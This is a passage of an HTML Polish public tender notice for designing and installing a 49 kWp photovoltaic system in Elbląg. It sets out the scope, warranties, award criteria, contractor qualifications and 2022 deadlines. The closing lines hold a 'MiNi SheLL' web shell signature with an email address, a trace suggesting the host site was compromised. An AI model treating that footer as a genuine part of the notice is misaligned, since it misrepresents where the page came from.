przeciwprzepięciową,<br/>-	ochronę przeciwporażeniową,<br/>-	ochronę przeciwpożarową.<br/>-	wyłączniki PWP po stronie AC i DC zlokalizowany przy wejściu do budynku.<br/>b)	Opracowania projektu wykonawczego, na podstawie projektu architektoniczno – budowlanego stanowiącego Załącznik nr 1.1 do SWZ, zgodnie z obowiązującymi przepisami prawa, w tym:<br/>-	Wykonania ponownych symulacji i obliczeń technicznych systemu fotowoltaicznego w oparciu o własne zakładane do montażu produkty w/w systemu.<br/>-	Obliczenia konstrukcyjne dachu i jego wytrzymałości z oferowanym systemem fotowoltaicznym.<br/>-	Wykonania doboru systemu fotowoltaicznego w oparciu o dedykowane układy falownikowe i panele wskazane przez Polskie Towarzystwo Przesyłu i Rozdziału Energii Elektrycznej - dalej PTPiREE jako Wykaz Certyfikowanych Urządzeń uznawany przez Energa-Operator Oddział w Elblągu. Aleja Józefa Piłsudskiego 2 82-300 Elbląg – dalej ENERGA - OPRTATOR, a także wykona stosowne zgłoszenia do Państwowej Straży Pożarnej w Elblągu – dalej PSP wraz z opinią rzeczoznawcy d. spraw przeciwpożarowych. <br/>-	Uwzględni występujące zacienienia od realizacyjnych obiektów w opracowanym schemacie symulacyjnym. Przy czym Zamawiający dopuszcza zmianę lokalizacji paneli fotowoltaicznych na dachach obiektów Zamawiającego przy czym efekt uzyskania energetyczny roczny i systemowy musi być równy lub większy niż wskazany w obliczeniowych projektowych dokumentacji stanowiącej Załącznik Nr 1 do SWZ. Zmianę lokalizacji rozmieszczenia paneli na dachach obiektów musi być potwierdzeniu przez autora projektu stanowiącego Załącznik Nr 1 SWZ i Zamawiającego.<br/>-	Złożenia wniosków materiałowych i uzgodnienia materiałów z Inspektorem nadzoru powołanego przez Zamawiającego i z Zamawiającym.<br/>c)	Nie później niż do 31 marca 2022r zgłoszenia przyłączenia mikroinstalacji do sieci ENERGA -OPERATOR na obowiązującym druku ENERGA - OPERATOR wraz z niezbędnymi dokumentami i oświadczeniami, w tym Oświadczeniem, o którym mowa w art. 7 ust. 8d6 Prawo energetyczne oraz Oświadczeniem instalatora mikroinstalacji.<br/>d)	Niezbędne uzgodnienia dokumentacji i uzyskania wszystkich pozwoleń w ENERGA - OPERATOR w zakresie nowego olicznikowania dwukierunkowego oraz niezbędne uzgodnienia dokumentacji z PSP i uzyskanie od niej pozytywnej oceny przyjętych rozwiązań, jeśli ocena będzie wymagana.<br/>e)	Wykonanie Instrukcji Eksploatacji Sytemu.<br/>f)	Dokonania stosownych uzgodnień z rzeczoznawcą do spraw przeciwpożarowych projektu wykonawczego i powykonawczego oraz niezbędnych zgłoszeń dla PSP i ENERGA – OPERATOR.<br/>g)	Opracowania dokumentacji powykonawczej wraz z instrukcją użytkowania.<br/>h)	Przekazania kompletnego systemu fotowoltaicznego do użytkowania Zamawiającemu.<br/>2)	Wykonawca udzieli Zamawiającemu gwarancji jakości na wykonane przedmiotu umowy w tym dokumentacji projektowej i roboty budowlane przez okres 3 lat oraz na zainstalowane urządzenia przez okres 15 lat od daty końcowego odbioru robót. W wymienionych terminach Wykonawca zobowiązany jest do bezpłatnego usuwania ujawnionych wad. <br/>3)	W ramach gwarancji przez okres 3 lat Wykonawca 2 razy w roku wykona bezpłatne przeglądy gwarancyjne systemu fotowoltaicznego wraz z ewentualnymi naprawami gwarancyjnymi. Przeglądy wykonane będą przez wykwalifikowane osoby posiadające również stosowne doświadczenie, Z przeglądu sporządzony zostanie protokół, który przekazany będzie w ciągu 3 dni roboczych Zamawiającemu. Nie dotyczy to zakresu konserwacji systemu fotowoltaicznego.<br/>4)	Szczegółowo zakres zamówienia w tym zakres inwestycji, warunki gwarancje i sposób realizacji i odbioru robót określony został w:<br/>a)	Dokumentacji stanowiącej Załącznik nr 1.3 do SWZ - Projekt architektoniczno - budowlany - Zmniejszenie energochłonności obiektu dydaktycznego przy Wspólnej 11-13 w Elblągu poprzez produkcję energii elektrycznej z systemu instalacji fotowoltaicznej o mocy 49 kWp.<br/>b)	Projekcie umowy stanowiącym ZAŁĄCZNIK Nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09331200-0 - Słoneczne moduły fotoelektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">51112000-0 - Usługi instalowania sprzętu sterowania i przesyłu energii elektrycznej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Uzysk mocy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki serwisu gwarancyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej: <br/>-	w zakresie I, II, III części zamówienia: warunek ten zostanie spełniony, gdy Wykonawca wykaże, że posiada doświadczenie polegające na wykonaniu, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej pięć zamówień polegających na wykonaniu systemu lub instalacji fotowoltaicznej o mocy równej lub większej niż 45kWp.<br/>-	w zakresie I, II, III części zamówienia: warunek ten zostanie spełniony, gdy Wykonawca wykaże, że w celu prawidłowej realizacji przedmiotowego zamówienia dysponuje kadrą, posiadającą wymagane aktualne uprawnienia i doświadczenie w swojej branży, tj.: do realizacji zamówienia posługiwać się będzie co najmniej osobami pełniącymi funkcje:<br/>•	projektant robót konstrukcyjno-budowlanych – 1 osobą posiadającą: uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń lub równoważne, co najmniej 3-letnie doświadczenie w projektowaniu w/w specjalności, <br/>•	projektanta robót elektrycznych – 1 osobą posiadającą: uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub równoważne, co najmniej 3-letnie doświadczenie w projektowaniu w/w specjalności, <br/>•	kierownika budowy w specjalności konstrukcyjnej– 1 osobą posiadającą: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub równoważne, co najmniej 3-letnie doświadczenie w pełnieniu funkcji kierownika budowy w w/w specjalności, <br/>•	kierownika robót elektrycznych – 1 osobą posiadającą: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub równoważne, co najmniej 3-letnie doświadczenie w pełnieniu funkcji kierownika budowy lub robót w w/w specjalności, w tym w zakresie roboty dotyczącej budowy systemu lub instalacji fotowoltaicznej o mocy powyżej 40 kWp<br/>•	rzeczoznawcy do spraw przeciwpożarowych – 1 osobą posiadającą uprawnienia rzeczoznawcy ds. przeciwpożarowych do uzgodnienia dokumentacji wykonawczej i powykonawczej instalacji fotowoltaicznej.<br/>Uwagi dotyczące oceny spełniania warunków udziału w postępowaniu określonych w pkt 3 dot. zdolności technicznej lub zawodowej:<br/>-	Zamawiający uzna roboty budowlane, zamówienia które zostały zakończone i odebrane przez zleceniodawców. Jako zakończenie roboty, zamówienia należy rozumieć podpisanie protokołu odbioru robót <br/>-	W przypadku wartości realizowanych robót rozliczanych w innej walucie niż PLN, Wykonawca przeliczy te wartości na PLN wg średniego kursu złotego w stosunku do walut obcych ogłaszanego przez Narodowy Bank Polski, obowiązującego na dzień, złożenia danego oświadczenia.<br/>-	Zamawiający wymaga uprawnień budowlanych w rozumieniu przepisów Prawa budowlanego oraz Rozporządzenia w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie.<br/>-	Wydanie decyzji w sprawie uznania kwalifikacji zawodowych w budownictwie nabytych w państwach członkowskich UE oraz wpis do stosownej izby odbywa się po przeprowadzeniu właściwego postępowania weryfikacyjnego przez odpowiedni organ samorządu zawodowego w Polsce na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej( tj. Dz.U.2018.2272).<br/>-	Zamawiający informuje, że doświadczenie wykazane w celu spełniania warunku udziału należy liczyć od daty uzyskania wymaganych uprawnień.<br/>-	Zamawiający zezwala na łączenie funkcji kierowników robót, projektantów w przypadku, gdy ta sama osoba posiada wymagane uprawnienia oraz doświadczenie w więcej niż jednej specjalności. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Do oferty każdy Wykonawca dołącza Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 125 ust. 1 ustawy PZP, według wzoru stanowiącego ZAŁĄCZNIK Nr 3:<br/>1)	Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe- o ile Zamawiający ich wymagał.<br/>2)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców Oświadczenie składa każdy z Wykonawców. Potwierdza ono brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3)	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z własnym Oświadczeniem także Oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	potwierdzających brak podstaw wykluczenia:<br/>a)	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej według wzoru</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty:<br/>-	Dokument składany jest na potwierdzenie spełniania warunku udziału określonego<br/>w Rozdz. V ust. 1 pkt. 2) lit. d) tiret 1.<br/>-	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SWZ. <br/>b)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>-	Dokument składany jest na potwierdzenie spełniania warunku udziału określonego<br/>w Rozdz. V ust. 1 pkt. 2) lit. d) tiret 2.<br/>-	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 6 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1)	Karty produktu w tym również deklaracja właściwości użytkowych elementów fotowoltaicznych lub dokument równoważny z podaniem zaoferowanych paneli fotowoltaicznych, przemienników częstotliwości oraz stosowanej konstrukcji montażowych pod panele, potwierdzające, że parametry oferowanego przedmiotu zamówienia odpowiadają wszystkim wymaganiom określonym przez Zamawiającego w ZAŁACZNIKU Nr 1 SWZ..<br/>a)	Karty produktu winny być sporządzone w języku polskim w formie zgodnej ze wzorem ich upublicznienia przez producenta, a jeśli producent ich nie upublicznia to w formie skanu podpisanego i opieczętowanego egzemplarza karty.<br/>b)	Wykonawca może dołączyć do Kart produktu materiały pozwalające ocenić proponowane parametry techniczne przedmiotu zamówienia (opisy, fotografie, katalogi). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 2.	Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>3.	Przepisu ust. 2 nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>4.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularza Oferty, którego wzór stanowi ZAŁĄCZNIK Nr 2.<br/>Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	W przypadku, o którym mowa w pkt. 1), Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	Zamawiający nie wymaga od Wykonawców jw. posiadania określonej formy prawnej w celu złożenia oferty.<br/>4)	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>5)	Jeżeli w postępowaniu zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy zgodnie z<br/>przepisami określonymi w Dziale VII-Rozdział 3 ustawy PZP i na warunkach określonych<br/>szczegółowo w Projekcie umowy w paragraf 13 Załącznik Nr 7 SWZ. Zmiana postanowień<br/>niniejszej umowy może nastąpić w formie pisemnej zgodnie z art. 455 PZP. Strony przewidują<br/>możliwość dokonywania zmian:1) na podstawie art. 455 ust. 1 pkt. 2,3,4 PZP 2) Z5)	Zmiana terminu wykonania zamówienia w następujących przypadkach: <br/>a)	wydłużenie terminu realizacji umowy, jeżeli z powodu niekorzystnych warunków atmosferycznych polegających na intensywnych opadach deszczu, gradu itp. oraz w przypadku wystąpienia ,,siły wyższej” w trakcie realizacji umowy, których nie dało się przewidzieć z należytą starannością, <br/>b)	wstrzymania robót budowlanych przez organy administracji publicznej; <br/>c)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności: wstrzymanie realizacji umowy przez Zamawiającego, działań osób po stronie Zamawiającego, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia; <br/>d)	zmiany będące następstwem działań osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia; <br/>e)	gdy zajdzie konieczność wykonania robót dodatkowych,; <br/>f)	wstrzymania robót spowodowanego wykryciem na przykład substancji i przedmiotów niebezpiecznych, szczątków ludzkich; <br/>g)	gdy wystąpią opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp., do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres, przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz opóźnienie to nie jest następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, <br/>h)	jeżeli wystąpi brak możliwości wykonywania robót z powodu niedopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy; <br/>i)	wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych i gruntowych, <br/>j)	wystąpienia niezinwentaryzowanych podziemnych sieci, instalacji, urządzeń, obiektów budowlanych, niewybuchów, niewypałów lub wykopalisk archeologicznych, <br/>k)	wystąpienia konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych, <br/>l)	wystąpienia sytuacji, utrudniającej wykonanie robót niezbędnych do zrealizowania przedmiotu umowy, ze względu na zasady wiedzy technicznej. <br/>6)	Sposób wykonania przedmiotu zamówienia, w szczególności, gdy zmiana sposobu realizacji zamówienia wynika ze zmian w obowiązujących przepisach prawa bądź wytycznych mających wpływ na wykonanie zamówienia, <br/>7)	Warunki oraz termin płatności, w szczególności w przypadku konieczności uwzględnienia okoliczności, których nie można było przewidzieć <br/>8)	Zmiany rozwiązań technicznych w dokumentacji projektowej - w uzasadnionych przypadkach <br/>9)	Pozostałe okoliczności powodujące możliwość zmiany umowy: <br/>a)	,,siła wyższa” uniemożliwiająca wykonanie przedmiotu umowy <br/>b)	zmiana lub rezygnacja z Podwykonawcy, <br/>c)	w przypadku zgłoszenia przez Wykonawcę zamiaru zmiany sposobu wykonywania umowy poprzez Podwykonawców,. <br/>10)	W przypadku zmiany powszechnie obowiązującego prawa - w zakresie mającym wpływ na realizację obowiązków umownych <br/>11)	wystąpienia oczywistych omyłek i błędów pisarskich poprzez ich poprawienie, <br/>12)	Inne zmiany a)	w przypadku zmian organizacyjno-prawnych występujących po stronie Zamawiającego <br/>b)	zmiana osób, przy pomocy których Wykonawca realizuje przedmiot zamówienia, <br/>c)	zmiana lub rezygnacja z Podwykonawcy, przy pomocy którego Wykonawca wykonuje przedmiot zamówienia, <br/>d)	rozszerzenie zakresu podwykonawstwa w porównaniu do podanego w Ofercie Wykonawcy; <br/>f)	w przypadku stwierdzenia, że okoliczności związane z wystąpieniem COVID-19 <br/>g)	w zakresie naliczenia kar umownych <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://epuap.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com